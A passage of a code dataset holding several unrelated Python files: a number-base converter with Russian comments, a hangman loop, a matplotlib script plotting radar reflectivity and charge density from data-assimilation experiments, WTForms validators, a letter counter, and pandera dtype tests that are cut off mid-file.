isdigit(num):\r\n\t\"\"\"Нужна проверка на разные системы счисления, в 16-й системе буква F это тоже число\"\"\"\r\n\treturn num in allow\r\n\r\ndef convert_num_sys_math_expr(str, sys_now, sys_will):\r\n\t\"\"\"Переводит систему счисления в математическом выражении\"\"\"\r\n\ti = 0\r\n\t\"\"\"Нужно для того, чтобы: последнее число было преобразовано (для этого нужен '\\n'.\r\n\t\t\t\t \t Почему? Число обрабатывается, когда находится что-то, кроме '.', ',' или числа.\r\n\t\t\t\t \t Если '\\n' не будет, то последнее число пропустится) и для сообщения о окончании строки,\r\n\t\t\t\t \t т.е. когда будет символ '\\0' то строка окончена.\"\"\"\r\n\tstr += '\\n\\0' \r\n\tnum = \"\"\r\n\tnum_start = 0\r\n\tnum_end = 0\r\n\tret = \"\"\r\n\twhile str[i] != '\\0':\r\n\t\tif str[i] == ' ':\r\n\t\t\ti += 1\r\n\t\t\tcontinue\r\n\t\t\"\"\"И тут возникла проблема. Абсолютно все числа могут быть представлены как буквы, если\r\n\t\t они в нужной системе счисления.\r\n\t\t Решено. Вроде.\"\"\"\r\n\t\tif isdigit(str[i]):\r\n\t\t\tif num == \"\":\r\n\t\t\t\tnum_start = i\r\n\t\t\t\tnum_end = i\r\n\t\t\telse:\r\n\t\t\t\tnum_end += 1\r\n\t\t\tnum += str[i]\r\n\t\telif (str[i] == '.') | (str[i] == ','):\r\n\t\t\tnum_end += 1\r\n\t\t\tnum += str[i]\r\n\t\telse:\r\n\t\t\tif num == \"\":\r\n\t\t\t\ti += 1\r\n\t\t\t\tcontinue\r\n\t\t\ttmp = convert_num_sys(num, sys_now, sys_will)\r\n\t\t\ttmp_str = str[0:num_start] + tmp + str[num_end + 1:len(str)]\r\n\t\t\t\"\"\"dif - разница между измененной длиной строки и той, которая была до этого.\r\n\t\t\t Иногда при переводе из 1-й системы счисления в другую изменяется количество\r\n\t\t\t позиций в числе, поэтому нужно инкрементировать i, чтобы выйти за границы \r\n\t\t\t добавленного числа. Пример: 2 + 2, 10 > 2. Количество позиций изменилось:\r\n\t\t\t число 2 в двоичной системе это 10. Поэтому нужно перейти за это число.\"\"\"\r\n\t\t\tdif = len(tmp_str) - len(str)\r\n\t\t\tif dif != 0:\r\n\t\t\t\ti += dif\r\n\t\t\tstr = tmp_str\r\n\t\t\tnum = \"\"\r\n\t\ti += 1\r\n\t\"\"\"-2 нужно, чтобы убрать добавленные до этого '\\n' и '\\0'\"\"\"\r\n\treturn str[0:len(str) - 2]\r\n\r\na = convert_num_sys_math_expr(\"aa\", 16, 10)\r\nprint(a)","sub_path":"number_system.py","file_name":"number_system.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202616049","text":"from words import *\nfrom outputs import *\n\n\nword, answer = default()\nattempts = 10\nused_attempts = 0\ncorrect = True\n\n\nwhile True:\n show_status(answer, used_attempts, attempts)\n letter = input(\"Letter: \")\n if not letter:\n print(\"You must type letter.\")\n else:\n if len(letter) == 1:\n answer, correct = letter_in_answer(letter, answer, word)\n if is_end(letter, answer, word, used_attempts, attempts):\n word, answer = default()\n attempts = 10\n used_attempts = -1\n if not correct:\n used_attempts += 1\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"88409361","text":"import numpy as np\nfrom netCDF4 import Dataset\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport matplotlib.colors as mcolors\nimport matplotlib.patches as patches\n\nfrom tools_LT import read_evar_only\n\nquick = True\n#quick = False\n\ndef read_vars( INFO, tlev=0, HIM8=True ):\n\n # Read variables\n if HIM8:\n fn_Him8 = os.path.join( INFO[\"GTOP\"], INFO[\"EXP\"], INFO[\"time0\"].strftime('%Y%m%d%H%M%S'), INFO[\"TYPE\"], INFO[\"MEM\"], \n \"Him8_\" + INFO[\"time0\"].strftime('%Y%m%d%H%M%S_') + INFO[\"MEM\"] + \".nc\") \n print( fn_Him8 )\n nc = Dataset(fn_Him8, 'r', format='NETCDF4')\n tbb = nc.variables[\"tbb\"][tlev,:,:,:]\n nc.close()\n else:\n tbb = np.zeros(1)\n\n fn_radar = os.path.join( INFO[\"GTOP\"], INFO[\"EXP\"], INFO[\"time0\"].strftime('%Y%m%d%H%M%S'), INFO[\"TYPE\"], INFO[\"MEM\"], \n \"radar_\" + INFO[\"time0\"].strftime('%Y%m%d%H%M%S_') + INFO[\"MEM\"] + \".nc\") \n print( fn_radar, tlev )\n nc = Dataset(fn_radar, 'r', format='NETCDF4')\n if INFO[\"TYPE\"] is \"fcst\":\n z = nc.variables[\"z\"][tlev,:,:,:]\n vr = nc.variables[\"vr\"][tlev,:,:,:]\n else:\n z = nc.variables[\"z\"][:,:,:]\n vr = nc.variables[\"vr\"][:,:,:]\n nc.close()\n\n return( tbb, z, vr )\n\ndef main( INFO, EXP1=\"2000m_DA_0306\", EXP2=\"2000m_DA_0306\", tlev=0, typ=\"anal\", vname=\"QG\" ):\n\n data_path = \"../../dat4figs/Fig05\"\n os.makedirs( data_path, exist_ok=True )\n\n print( tlev, INFO[\"DT\"]*tlev )\n\n #ctime = datetime(2001, 1, 1, 1, 0) + timedelta(seconds=INFO[\"DT\"]*tlev ) \n ctime = INFO[\"time0\"] + timedelta(seconds=INFO[\"DT\"]*tlev ) \n if typ is not \"fcst\":\n ctime = datetime(2001, 1, 1, 1, 0) + timedelta(seconds=INFO[\"DT\"]*tlev ) \n\n INFO[\"EXP\"] = EXP1\n INFO[\"MEM\"] = \"mean\"\n INFO[\"TYPE\"] = typ\n if typ is not \"fcst\":\n INFO[\"time0\"] = ctime\n\n print(\"CHECK\", INFO[\"time0\"] )\n# tbb_exp1, z_exp1, vr_exp1 = read_vars( INFO, tlev=tlev, HIM8=False )\n# evar_exp1 = read_evar_only( INFO, tlev=tlev, vname=vname )\n# efp_exp1 = read_evar_only( INFO, tlev=tlev, vname=\"FP\" )\n\n INFO[\"EXP\"] = EXP2\n# tbb_exp2, z_exp2, vr_exp2 = read_vars( INFO, tlev=tlev, HIM8=False )\n# evar_exp2 = read_evar_only( INFO, tlev=tlev, vname=vname )\n# efp_exp2 = read_evar_only( INFO, tlev=tlev, vname=\"FP\" )\n\n ft_sec = int( INFO[\"DT\"]*tlev )\n\n # nature run\n # read variables\n INFO[\"EXP\"] = EXP1\n INFO[\"MEM\"] = \"mean\"\n INFO[\"TYPE\"] = \"fcst\"\n INFO[\"time0\"] = datetime(2001, 1, 1, 1, 0)\n tlev_nat = int( ( ctime - datetime(2001, 1, 1, 1, 0) ).total_seconds() / INFO[\"DT\"] )\n print( \"DEBUG\", tlev_nat, ctime)\n# tbb_nat, z_nat, vr_nat = read_vars( INFO, tlev=tlev_nat, HIM8=False )\n# evar_nat = read_evar_only( INFO, tlev=tlev_nat, vname=vname )\n# efp_nat = read_evar_only( INFO, tlev=tlev_nat, vname=\"FP\" )\n# \n# print(\"evars: \", evar_nat.shape, evar_exp1.shape, evar_exp2.shape )\n\n\n tit_l = [ \"NODA (analysis)\", \n \"RDA (analysis)\", \n \"Nature run\" ]\n if typ is \"fcst\":\n foot = \"\\n(fcst from mean)\"\n if ft_sec == 0:\n foot = \"\\n(analysis)\"\n tit_l = [\n \"NODA\" + foot, \n \"RDA\" + foot, \n \"Nature run\",\n \"NODA\" + foot, \n \"RDA\" + foot, \n \"Nature run\",\n ]\n\n# print( z_nat.shape, z_exp1.shape, z_exp2.shape )\n\n\n fig, ((ax1,ax2,ax3), (ax4,ax5,ax6) ) = plt.subplots(2, 3, figsize=(11,8.2))\n fig.subplots_adjust(left=0.06, bottom=0.05, right=0.93, top=0.94,\n wspace=0.2, hspace=0.3)\n \n ax_l = [ax1, ax2, ax3, ax4, ax5, ax6]\n\n levs_dbz= np.array([15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65])\n cmap_dbz = mcolors.ListedColormap(['cyan','dodgerblue', \n 'lime', 'limegreen','yellow',\n 'orange', 'red', 'firebrick', 'magenta',\n 'purple'])\n cmap_dbz.set_under('w', alpha=1.0)\n cmap_dbz.set_over('gray', alpha=1.0)\n\n cmap_rb = plt.cm.get_cmap(\"RdBu_r\")\n cmap_rb.set_under('gray', alpha=1.0)\n cmap_rb.set_over('gray', alpha=1.0)\n\n\n unit_dbz = \"(dBZ)\"\n unit_crg = r'(nC m$^{-3}$)'\n \n #levs_rb_qcrg = np.array([-1, -0.8, -0.6, -0.4, -0.2, -0.1,\n # 0.1, 0.2, 0.4, 0.6, 0.8, 1])\n levs_rb_qcrg = np.array([-0.4, -0.3, -0.2, -0.1, -0.05, -0.01,\n 0.01, 0.05, 0.1, 0.2, 0.3, 0.4, ])\n\n\n levs_rb_qcrg = np.array([-0.6, -0.4, -0.2, -0.1, -0.05, -0.01,\n 0.01, 0.05, 0.1, 0.2, 0.4, 0.6])\n\n levs_l = [ levs_dbz, levs_dbz, levs_dbz, \n levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg]\n cmap_l = [ cmap_dbz, cmap_dbz, cmap_dbz, \n cmap_rb, cmap_rb, cmap_rb ]\n unit_l = [ unit_dbz, unit_dbz, unit_dbz,\n unit_crg, unit_crg, unit_crg ]\n\n pnum_l = [\n \"(a)\", \"(b)\", \"(c)\",\n \"(d)\", \"(e)\", \"(f)\",\n ]\n\n tvar = vname\n if vname is \"QCRG\":\n levs = levs_rb_qcrg\n cmap = cmap_rb\n unit = unit_crg\n tvar = \"Total charge density\"\n\n\n bbox = { 'facecolor':'w', 'alpha':0.95, 'pad':1.5, 'edgecolor':'w' }\n\n\n xmin = 120\n xmax = 280\n ymin = 120\n ymax = 320\n\n\n ft_sec_a = int( ( ctime - INFO[\"time00\"] ).total_seconds() )\n print( \"ctime\",ctime, tlev, INFO[\"DT\"])\n\n \n xlabel = \"X (km)\"\n ylabel = \"Y (km)\"\n\n xaxis = INFO[\"X\"][:] * 0.001\n yaxis = INFO[\"Y\"][:] * 0.001\n\n x2d, y2d = np.meshgrid( yaxis, xaxis )\n xdgrid = 20\n ydgrid = 20\n\n zlev_show = 8 \n zlev_show = 10\n zlev_show = 16\n zlev_show = 14 # comment out \n\n if typ is not \"fcst\":\n info = 't={0:.0f} min\\nZ={1:} km'.format( ft_sec_a/60.0, INFO[\"Z\"][zlev_show]/1000)\n else:\n info = 't={0:.0f} min (FT={1:.0f} min)\\nZ={2:} km'.format( ft_sec_a/60.0, ft_sec/60.0, INFO[\"Z\"][zlev_show]/1000)\n \n# if typ is not \"fcst\":\n# VAR_l = [ \n# z_exp1[zlev_show,:,:], \n# z_exp2[zlev_show,:,:], \n# z_nat[zlev_show,:,:],\n# evar_exp1[0,zlev_show,:,:], \n# evar_exp2[0,zlev_show,:,:], \n# evar_nat[0,zlev_show,:,:]]\n# else:\n# VAR_l = [ \n# z_exp1[zlev_show,:,:], \n# z_exp2[zlev_show,:,:], \n# z_nat[zlev_show,:,:], \n# evar_exp1[0,zlev_show,:,:], \n# evar_exp2[0,zlev_show,:,:], \n# evar_nat[0,zlev_show,:,:]\n# ]\n# FP_l = [ np.sum( efp_exp1[0,:,:,:], axis=0), \n# np.sum(efp_exp2[0,:,:,:], axis=0), \n# np.sum(efp_nat[0,:,:,:], axis=0) ]\n\n for idx, ax in enumerate(ax_l):\n fn = '{0:}/data{1:0=2}.npz'.format( data_path, idx )\n print( fn )\n# np.savez( fn, data=VAR_l[idx][:,:] )\n data = np.load( fn )['data']\n\n# print(idx,tit_l[idx])\n# print( VAR_l[idx].shape, np.max(VAR_l[idx]), np.min(VAR_l[idx]) )\n\n #SHADE = ax.pcolormesh(x2d, y2d,\n SHADE = ax.contourf(x2d, y2d,\n data,\n #VAR_l[idx][:,:],\n levels=levs_l[idx],\n #vmin=np.min(levs),\n #vmax=np.max(levs),\n cmap=cmap_l[idx],\n extend='both',\n )\n\n if typ is \"fcst\" and ft_sec > 0:\n ssize = 10.0\n idx_ = idx\n if idx > 2:\n idx_ = idx - 3\n# fp2d = FP_l[idx_] \n# #fp2d[ fp2d < 1.0 ] = np.nan\n# #fp2d = fp2d / ssize\n# fp2d = np.where( fp2d >= 1.0, ssize, np.nan )\n fn_fp = '{0:}/data{1:0=2}_fp.npz'.format( data_path, idx )\n# np.savez( fn_fp, data=fp2d )\n data = np.load( fn_fp )['data']\n #ax.scatter( x2d, y2d, s=fp2d, \n ax.scatter( x2d, y2d, s=data, \n c='k', marker='s', \n edgecolors=\"w\", linewidths=0.5 )\n\n ax.set_xlim( xmin, xmax )\n ax.set_ylim( ymin, ymax )\n ax.xaxis.set_ticks( np.arange(xmin, xmax, xdgrid) )\n ax.yaxis.set_ticks( np.arange(ymin, ymax, ydgrid) )\n ax.tick_params(axis='both', which='minor', labelsize=7 )\n ax.tick_params(axis='both', which='major', labelsize=7 )\n\n ax.text(0.5, 0.95, tit_l[idx],\n fontsize=12, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='top', \n bbox=bbox )\n \n ax.text(0.1, 0.95, pnum_l[idx],\n fontsize=10, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='top', \n bbox=bbox )\n\n ax.set_xlabel( xlabel, fontsize=8 )\n ax.set_ylabel( ylabel, fontsize=8 )\n\n if idx == 2 or idx == 5:\n \n pos = ax.get_position()\n cb_h = pos.height\n cb_w = 0.01\n ax_cb = fig.add_axes( [pos.x1+0.01, pos.y0, cb_w, cb_h] )\n cb = plt.colorbar( SHADE, cax=ax_cb, orientation = 'vertical', \n ticks=levs_l[idx], extend='both' )\n cb.ax.tick_params( labelsize=8 )\n ax.text( 1.0, -0.03, unit_l[idx],\n fontsize=9, transform=ax.transAxes,\n horizontalalignment='left',\n verticalalignment='top', )\n \n ax.text( 1.0, 1.1, info,\n fontsize=10, transform=ax.transAxes,\n horizontalalignment='right',\n verticalalignment='center', )\n\n if idx == 1 or idx == 4:\n tvar_ = tvar\n if idx == 1:\n tvar_ = \"Radar reflectivity\"\n ax.text( 0.5, 1.1, tvar_,\n fontsize=15, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='center', )\n\n# fig_tit = tvar\n# fig.suptitle( fig_tit, fontsize=16 )\n\n\n #odir = \"png/6p_DA_var\" \n odir = \"pdf/fig20210624\" \n\n #ofig = '6p_{:1}_{:2}_{:3}_fta{:05}_ft{:05}_z{:0=2}_{:}.png'.format(typ, EXP1, EXP2, ft_sec_a, ft_sec, zlev_show, vname)\n ofig = '6p_{:1}_{:2}_{:3}_fta{:05}_ft{:05}_z{:0=2}_{:}.pdf'.format(typ, EXP1, EXP2, ft_sec_a, ft_sec, zlev_show, vname)\n\n\n print( ofig, odir )\n \n if not quick:\n os.makedirs(odir, exist_ok=True)\n plt.savefig(os.path.join(odir,ofig),\n bbox_inches=\"tight\", pad_inches = 0.1)\n plt.clf()\n plt.close('all')\n else:\n plt.show()\n\n\n\n###################\n\nDX = 2000.0\nDY = 2000.0\nXDIM = 192\nYDIM = 192\nTDIM = 13\nZDIM = 40\n\nXDIM = 176\nYDIM = 176\nZDIM = 45\n\nDZ = 500.0\nDT = 300\n\nX = np.arange( DX*0.5, DX*XDIM, DX )\nY = np.arange( DY*0.5, DY*YDIM, DY )\nT = np.arange( 0, DT*TDIM, DT )\nBAND = np.arange( 7, 17, 1 )\n\nZ = np.arange(DZ*0.5, DZ*ZDIM, DZ)\n\n#EXP = \"2000m_NODA_1022_FIR2km_N\"\n#time0 = datetime( 2001, 1, 1, 1, 0, 0 )\nEXP = \"2000m_DA_1022_FIR2km_N\"\n\nEXP = \"2000m_DA_0302\"\n\nEXP1 = \"2000m_DA_0306\"\n\nEXP1 = \"2000m_NODA_0306\"\nEXP2 = \"2000m_DA_0306\"\n\n\nEXP1 = \"2000m_NODA_0601\"\nEXP2 = \"2000m_DA_0601\"\n\nEXP1 = \"2000m_NODA_0723\"\nEXP2 = \"2000m_DA_0723\"\n\n#EXP1 = \"2000m_DA_0306_R_FP_180km\"\n\ntime0 = datetime( 2001, 1, 1, 1, 20, 0 ) \ntime0 = datetime( 2001, 1, 1, 1, 30, 0 ) \n\nGTOP = \"/data_honda01/honda/SCALE-LETKF/scale-LT/OUTPUT\"\nTYPE = \"fcst\"\nMEM = \"mean\"\nMEM = \"0025\"\ntime00 = datetime( 2001, 1, 1, 0, 0, 0 )\n\nINFO = {\"XDIM\":XDIM, \"YDIM\":YDIM, \"NBAND\":10, \"TDIM\":TDIM,\n \"X\":X, \"Y\":Y , \"BAND\":BAND, \"T\":T, \"GTOP\":GTOP,\n \"ZDIM\":ZDIM, \"Z\":Z, \"DT\":DT,\n \"TYPE\":TYPE, \"MEM\":MEM, \"EXP\":EXP,\n \"time0\": time0, \"time00\": time00 }\n\ntmax = 13\ntmax = 7\ntmin = 0\n\ntmin = 0\ntmax = tmin + 1\ntmin = 6\ntmax = 7\n#tmax = 1\n\ntyp = \"anal\"\ntyp = \"fcst\"\n\nvname = \"QCRG\"\n\n\nif typ is not \"fcst\":\n tmin = 1\n\nfor tlev in range( tmin, tmax ):\n INFO[\"time0\"] = time0\n main( INFO, EXP1=EXP1, EXP2=EXP2, tlev=tlev, typ=typ, vname=vname )\n","sub_path":"src/Fig05_repo.py","file_name":"Fig05_repo.py","file_ext":"py","file_size_in_byte":12092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"294402653","text":"from wtforms import ValidationError\n\n\nclass Length:\n def __init__(self, min=-1, max=-1, message=None):\n self.min = min\n self.max = max\n if not message:\n mesasge = u'Field must be between {} and {}'.format(min, max)\n\n self.message = message\n\n def __call__(self, form, field):\n length = field.data and len(field.data) or 0\n if length < self.min or self.max != -1 and length > self.max:\n raise ValidationError(self.message)\n\n\nlength = Length\n\n\nclass IsValidValue:\n def __init__(self, min=0, max=0, message=None):\n self.min = min\n self.max = max\n if not message:\n message = u'Field must be between {} and {}'.format(min, max)\n\n self.message = message\n\n def __call__(self, form, field):\n value = field.data\n if not (value <= self.max and value >= self.min):\n raise ValidationError(self.message)\n\n\nisValidValue = IsValidValue\n","sub_path":"meetthings/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141854174","text":"# Finder\n#Lets You find The number of letters\n\ndef main():\n \n #For entering a word\n nanme = input('Enter a Name: ').lower()\n \n #For entering the letter you want to search for\n lett = input('What Letter Do You Want to Find: ')\n\n count = 0\n\n for c in nanme:\n if c == lett:\n count +=1\n print(count) \n\n \n\n\nmain() \n","sub_path":"ActualCode.py","file_name":"ActualCode.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"405998270","text":"\"\"\"Tests a variety of python and pandas dtypes, and tests some specific\ncoercion examples.\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom packaging import version\n\nimport pandera as pa\nfrom pandera import (\n Bool,\n Category,\n Check,\n Column,\n DataFrameSchema,\n DateTime,\n Float,\n Int,\n Object,\n PandasDtype,\n SeriesSchema,\n String,\n Timedelta,\n)\nfrom pandera.dtypes import (\n _DEFAULT_NUMPY_FLOAT_TYPE,\n _DEFAULT_NUMPY_INT_TYPE,\n _DEFAULT_PANDAS_FLOAT_TYPE,\n _DEFAULT_PANDAS_INT_TYPE,\n)\nfrom pandera.errors import SchemaError\n\nPANDAS_VERSION = version.parse(pd.__version__)\n\nTESTABLE_DTYPES = [\n (Bool, \"bool\"),\n (DateTime, \"datetime64[ns]\"),\n (Category, \"category\"),\n (Float, Float.str_alias),\n (Int, Int.str_alias),\n (Object, \"object\"),\n (String, String.str_alias),\n (Timedelta, \"timedelta64[ns]\"),\n (\"bool\", \"bool\"),\n (\"datetime64[ns]\", \"datetime64[ns]\"),\n (\"category\", \"category\"),\n (\"float64\", \"float64\"),\n]\n\n\ndef test_default_numeric_dtypes():\n \"\"\"Test that default numeric dtypes int and float are consistent.\"\"\"\n assert str(pd.Series([1]).dtype) == _DEFAULT_PANDAS_INT_TYPE\n assert pa.Int.str_alias == _DEFAULT_PANDAS_INT_TYPE\n assert str(pd.Series([1], dtype=int).dtype) == _DEFAULT_NUMPY_INT_TYPE\n assert str(pd.Series([1], dtype=\"int\").dtype) == _DEFAULT_NUMPY_INT_TYPE\n\n assert str(pd.Series([1.0]).dtype) == _DEFAULT_PANDAS_FLOAT_TYPE\n assert pa.Float.str_alias == _DEFAULT_PANDAS_FLOAT_TYPE\n assert (\n str(pd.Series([1.0], dtype=float).dtype) == _DEFAULT_NUMPY_FLOAT_TYPE\n )\n assert (\n str(pd.Series([1.0], dtype=\"float\").dtype) == _DEFAULT_NUMPY_FLOAT_TYPE\n )\n\n\ndef test_numeric_dtypes():\n \"\"\"Test every numeric type can be validated properly by schema.validate\"\"\"\n for dtype in [pa.Float, pa.Float16, pa.Float32, pa.Float64]:\n assert all(\n isinstance(\n schema.validate(\n pd.DataFrame(\n {\"col\": [-123.1, -7654.321, 1.0, 1.1, 1199.51, 5.1]},\n dtype=dtype.str_alias,\n )\n ),\n pd.DataFrame,\n )\n for schema in [\n DataFrameSchema({\"col\": Column(dtype, nullable=False)}),\n DataFrameSchema(\n {\"col\": Column(dtype.str_alias, nullable=False)}\n ),\n ]\n )\n\n for dtype in [pa.Int, pa.Int8, pa.Int16, pa.Int32, pa.Int64]:\n assert all(\n isinstance(\n schema.validate(\n pd.DataFrame(\n {\"col\": [-712, -4, -321, 0, 1, 777, 5, 123, 9000]},\n dtype=dtype.str_alias,\n )\n ),\n pd.DataFrame,\n )\n for schema in [\n DataFrameSchema({\"col\": Column(dtype, nullable=False)}),\n DataFrameSchema(\n {\"col\": Column(dtype.str_alias, nullable=False)}\n ),\n ]\n )\n\n for dtype in [pa.UInt8, pa.UInt16, pa.UInt32, pa.UInt64]:\n assert all(\n isinstance(\n schema.validate(\n pd.DataFrame(\n {\"col\": [1, 777, 5, 123, 9000]}, dtype=dtype.str_alias\n )\n ),\n pd.DataFrame,\n )\n for schema in [\n DataFrameSchema({\"col\": Column(dtype, nullable=False)}),\n DataFrameSchema(\n {\"col\": Column(dtype.str_alias, nullable=False)}\n ),\n ]\n )\n\n\n@pytest.mark.skipif(\n PANDAS_VERSION.release < (1, 0, 0), # type: ignore\n reason=\"pandas >= 1.0.0 required\",\n)\n@pytest.mark.parametrize(\n \"dtype\",\n [\n pa.INT8,\n pa.INT16,\n pa.INT32,\n pa.INT64,\n pa.UINT8,\n pa.UINT16,\n pa.UINT32,\n pa.UINT64,\n ],\n)\n@pytest.mark.parametrize(\"coerce\", [True, False])\ndef test_pandas_nullable_int_dtype(dtype, coerce):\n \"\"\"Test that pandas nullable int dtype can be specified in a schema.\"\"\"\n assert all(\n isinstance(\n schema.validate(\n pd.DataFrame(\n # keep max range to 127 in order to support Int8\n {\"col\": range(128)},\n **({} if coerce else {\"dtype\": dtype.str_alias}),\n )\n ),\n pd.DataFrame,\n )\n for schema in [\n DataFrameSchema(\n {\"col\": Column(dtype, nullable=False)}, coerce=coerce\n ),\n DataFrameSchema(\n {\"col\": Column(dtype.str_alias, nullable=False)}, coerce=coerce\n ),\n ]\n )\n\n\n@pytest.mark.parametrize(\"str_alias\", [\"foo\", \"bar\", \"baz\", \"asdf\", \"qwerty\"])\ndef test_unrecognized_str_aliases(str_alias):\n \"\"\"Test that unrecognized string aliases are supported.\"\"\"\n with pytest.raises(TypeError):\n PandasDtype.from_str_alias(str_alias)\n\n\ndef test_category_dtype():\n \"\"\"Test the category type can be validated properly by schema.validate\"\"\"\n schema = DataFrameSchema(\n columns={\n \"col\": Column(\n pa.Category,\n checks=[\n Check(lambda s: set(s) == {\"A\", \"B\", \"C\"}),\n Check(\n lambda s: s.cat.categories.tolist() == [\"A\", \"B\", \"C\"]\n ),\n Check(lambda s: s.isin([\"A\", \"B\", \"C\"])),\n ],\n nullable=False,\n ),\n },\n coerce=False,\n )\n validated_df = schema.validate(\n pd.DataFrame(\n {\"col\": pd.Series([\"A\", \"B\", \"A\", \"B\", \"C\"], dtype=\"category\")}\n )\n )\n assert isinstance(validated_df, pd.DataFrame)\n\n\ndef test_category_dtype_coerce():\n \"\"\"Test coercion of the category type is validated properly by\n schema.validate and fails safely.\"\"\"\n columns = {\n \"col\": Column(\n pa.Category,\n checks=Check(lambda s: set(s) == {\"A\", \"B\", \"C\"}),\n nullable=False,\n ),\n }\n\n with pytest.raises(SchemaError):\n DataFrameSchema(columns=columns, coerce=False).validate(\n pd.DataFrame(\n {\"col\": pd.Series([\"A\", \"B\", \"A\", \"B\", \"C\"], dtype=\"object\")}\n )\n )\n\n validated_df = DataFrameSchema(columns=columns, coerce=True).validate(\n pd.DataFrame(\n {\"col\": pd.Series([\"A\", \"B\", \"A\", \"B\", \"C\"], dtype=\"object\")}\n )\n )\n assert isinstance(validated_df, pd.DataFrame)\n\n\ndef helper_type_validation(dataframe_type, schema_type, debugging=False):\n \"\"\"\n Helper function for using same or different dtypes for the dataframe and\n the schema_type\n \"\"\"\n df = pd.DataFrame({\"column1\": [dataframe_type(1)]})\n if debugging:\n print(dataframe_type, df.column1)\n schema = pa.DataFrameSchema({\"column1\": pa.Column(schema_type)})\n if debugging:\n print(schema)\n schema(df)\n\n\n@pytest.mark.parametrize(\n \"type1, type2\",\n [\n # Pandas always converts complex numbers to np.complex128\n (np.complex_, np.complex_),\n (np.complex_, np.complex128),\n (np.complex128, np.complex_),\n (np.complex64, np.complex128),\n (np.complex128, np.complex128),\n # Pandas always converts float numbers to np.float64\n (np.float_, np.float_),\n (np.float_, np.float64),\n (np.float16, np.float64),\n (np.float32, np.float64),\n (np.float64, np.float64),\n # Pandas always converts int numbers to np.int64\n (np.int_, np.int64),\n (np.int8, np.int64),\n (np.int16, np.int64),\n (np.int32, np.int64),\n (np.int64, np.int64),\n # Pandas always converts int numbers to np.int64\n (np.uint, np.int64),\n (np.uint, np.int64),\n (np.uint8, np.int64),\n (np.uint16, np.int64),\n (np.uint32, np.int64),\n (np.uint64, np.int64),\n (np.bool_, np.bool_),\n (np.str_, np.str_)\n # np.object, np.void and bytes are not tested\n ],\n)\ndef test_valid_numpy_type_conversions(type1, type2):\n \"\"\"Test correct conversions of numpy dtypes\"\"\"\n try:\n helper_type_validation(type1, type2)\n except: # pylint: disable=bare-except\n # No exceptions since it should cover all exceptions for debug\n # purpose\n # Rerun test with debug inforation\n print(f\"Error on types: {type1}, {type2}\")\n helper_type_validation(type1, type2, True)\n\n\n@pytest.mark.parametrize(\n \"type1, type2\",\n [\n (np.complex_, np.int_),\n (np.int_, np.complex_),\n (float, np.complex_),\n (np.complex_, float),\n (np.int_, np.float_),\n (np.uint8, np.float_),\n (np.complex_, str),\n ],\n)\ndef test_invalid_numpy_type_conversions(type1, type2):\n \"\"\"Test various numpy dtypes\"\"\"\n with pytest.raises(SchemaError):\n helper_type_validation(type1, type2)\n\n PandasDtype.from_numpy_type(np.float_)\n with pytest.raises(TypeError):\n PandasDtype.from_numpy_type(pd.DatetimeIndex)\n\n\ndef test_datetime():\n \"\"\"Test datetime types can be validated properly by schema.validate\"\"\"\n schema = DataFrameSchema(\n columns={\n \"col\": Column(\n pa.DateTime,\n checks=Check(lambda s: s.min() > pd.Timestamp(\"2015\")),\n )\n }\n )\n\n validated_df = schema.validate(\n pd.DataFrame(\n {\"col\": pd.to_datetime([\"2019/01/01\", \"2018/05/21\", \"2016/03/10\"])}\n )\n )\n\n assert isinstance(validated_df, pd.DataFrame)\n\n with pytest.raises(SchemaError):\n schema.validate(pd.DataFrame({\"col\": pd.to_datetime([\"2010/01/01\"])}))\n\n\n@pytest.mark.skipif(\n PANDAS_VERSION.release < (1, 0, 0), # type: ignore\n reason=\"pandas >= 1.0.0 required\",\n)\ndef test_pandas_extension_types():\n \"\"\"Test pandas extension data type happy path.\"\"\"\n # pylint: disable=no-member\n test_params = [\n (\n pd.CategoricalDtype(),\n pd.Series([\"a\", \"a\", \"b\", \"b\", \"c\", \"c\"], dtype=\"category\"),\n None,\n ),\n (\n pd.DatetimeTZDtype(tz=\"UTC\"),\n pd.Series(\n pd.date_range(start=\"20200101\", end=\"20200301\"),\n dtype=\"datetime64[ns, utc]\",\n ),\n None,\n ),\n (pd.Int64Dtype(), pd.Series(range(10), dtype=\"Int64\"), None),\n (\n pd.StringDtype(),\n pd.Series([\"foo\", \"bar\", \"baz\"], dtype=\"string\"),\n None,\n ),\n (\n pd.PeriodDtype(freq=\"D\"),\n pd.Series(pd.period_range(\"1/1/2019\", \"1/1/2020\", freq=\"D\")),\n None,\n ),\n (\n pd.SparseDtype(\"float\"),\n pd.Series(range(100))\n .where(lambda s: s < 5, other=np.nan)\n .astype(\"Sparse[float]\"),\n {\"nullable\": True},\n ),\n (pd.BooleanDtype(), pd.Series([1, 0, 0, 1, 1], dtype=\"boolean\"), None),\n (\n pd.IntervalDtype(subtype=\"int64\"),\n pd.Series(pd.IntervalIndex.from_breaks([0, 1, 2, 3, 4])),\n None,\n ),\n ]\n for dtype, data, series_kwargs in test_params:\n series_kwargs = {} if series_kwargs is None else series_kwargs\n series_schema = SeriesSchema(pandas_dtype=dtype, **series_kwargs)\n assert isinstance(series_schema.validate(data), pd.Series)\n\n\ndef test_python_builtin_types():\n \"\"\"Test support python data types can be used for validation.\"\"\"\n schema = DataFrameSchema(\n {\n \"int_col\": Column(int),\n \"float_col\": Column(float),\n \"str_col\": Column(str),\n \"bool_col\": Column(bool),\n \"object_col\": Column(object),\n \"complex_col\": 